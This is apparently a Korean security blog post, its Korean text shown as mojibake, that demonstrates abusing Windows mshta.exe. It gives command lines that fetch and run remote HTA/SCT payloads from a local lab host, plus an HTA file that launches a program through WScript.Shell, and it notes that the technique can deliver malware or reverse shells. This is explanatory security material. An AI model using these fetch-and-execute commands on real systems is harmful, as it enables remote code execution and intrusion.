command-line
mshta.exe vbscript:Close(Execute("GetObject(""script:http://127.0.0.1:4444/payload.sct"")"))
mshta.exe http://127.0.0.1:4444/payload.hta
mshta.exe \\127.0.0.1\folder\payload.hta
payload.hta (SCT payloads)
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
๊ฒฐ๊ณผ
HTA(HTML Application)
๋ณด๋ ๊ฒ์ฒ๋ผ ์๋์ฐ์ ๊ธฐ๋ณธ์ ์ผ๋ก ์ค์น๋ mshta.exe(Microsoft HTML Application)๋ ๋ง์น ์น ๋ธ๋ผ์ฐ์ ์ฒ๋ผ ์ธ๋ถ์ ์๋ ์น ํ์ด์ง๋ฅผ ์์ฒญํ๋ ๊ธฐ๋ฅ์ ๊ฐ์ง๊ณ ์๋ค.
์ฌ๊ธฐ์ ๋ฌธ์ ์ ์ ์ฌ๊ธฐ์ ๋ด์ฅ๋ ๋ธ๋ผ์ฐ์ ๊ฐ ์ธํฐ๋ท ์ต์คํ๋ก๋ฌ ๊ธฐ๋ฐ์ธ์ง ActiveXObject๊ฐ ์คํ์ด ๊ฐ๋ฅํด ์ ๋ช ๋ น์ด๊ฐ ์ ๋๋ก ์๋์ ํ๋ค. (๋ฐ๋ก ActiveXObject๋ฅผ ์คํํ๊ฒ ๋๋ ๊ฒฝ๊ณ ๋ฌธ๋ ๋์ค์ง ์์๋ค.)
์ธ๋ถ์ ์กด์ฌํ๋ ์น ํ์ด์ง๋ฅผ ์์ฒญํ๋ ์กฐํฉ์๋ค๊ฐ ์ปดํจํฐ ๋ด์ ์์ ์คํํ๋ ๋ํ์ฅํํฐ๊ฐ ๋ฒ์ด์ง๋ ๊ฒ
๋์ฌ์จ์ด ์ค์น๋ ๋ฌผ๋ก ๋ฆฌ๋ฒ์ค์์ ์ฐ๊ฒฐํ๋๋ฐ๋ ์ด๊ฒ์ด ์ถฉ๋ถํ ์ ์ฉ๋ ์๊ฐ ์๋ค.
์ถ์ฒ:
https://podalirius.net/en/articles/windows-reverse-shells-cheatsheet/
Windows Reverse Shells Cheatsheet
Windows Reverse Shells : 3 payloads in 1 different languages !
podalirius.net
https://www.ahnlab.com/kr/site/securityinfo/asec/asecView.do?groupCode=VNI001&seq=25631
AhnLab | ASEC Report
์ต๊ณ ์ ์ ์ฑ์ฝ๋ ๋ถ์๊ฐ ๋ฐ ๋ณด์ ์ ๋ฌธ๊ฐ ์กฐ์ง์ธ ASEC(AhnLab Security Emergency response Center)์ด ์ต์ ๋ณด์ ์ํ์ ๋ํ ์์ธํ ๋ถ์ ์ ๋ณด๋ฅผ ์ ๊ณตํฉ๋๋ค.
www.ahnlab.com
'๐์ ๋ณด๋ณด์ > ์์คํ ๋ณด์' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
์์คํ ๋ณด์ - EXE ํ์ผ PE(Portable Executable) ๊ตฌ์กฐ ๋ถ์ํ๊ธฐ (0) | 2023.10.07 |
---|---|
์์คํ ๋ณด์ - pwntools (0) | 2023.03.25 |
์์คํ ๋ณด์ - ์คํ ํ์ผ์ด ์๋ ์ฐํ ๊ธฐ๋ฒ(ํ์ผ๋ฆฌ์ค ๊ณต๊ฒฉ) (0) | 2023.02.07 |
์์คํ ๋ณด์ - ํ์ด์ฌ ๋ฆฌ๋ฒ์ค ์ ์คํฌ๋ฆฝํธ (0) | 2023.01.25 |
์์คํ ๋ณด์ - ๋ฉํ์คํ๋ก์ msfvenom ๋ฆฌ๋ฒ์ค ์ ์ ์ ๋ช ๋ น์ด (0) | 2023.01.24 |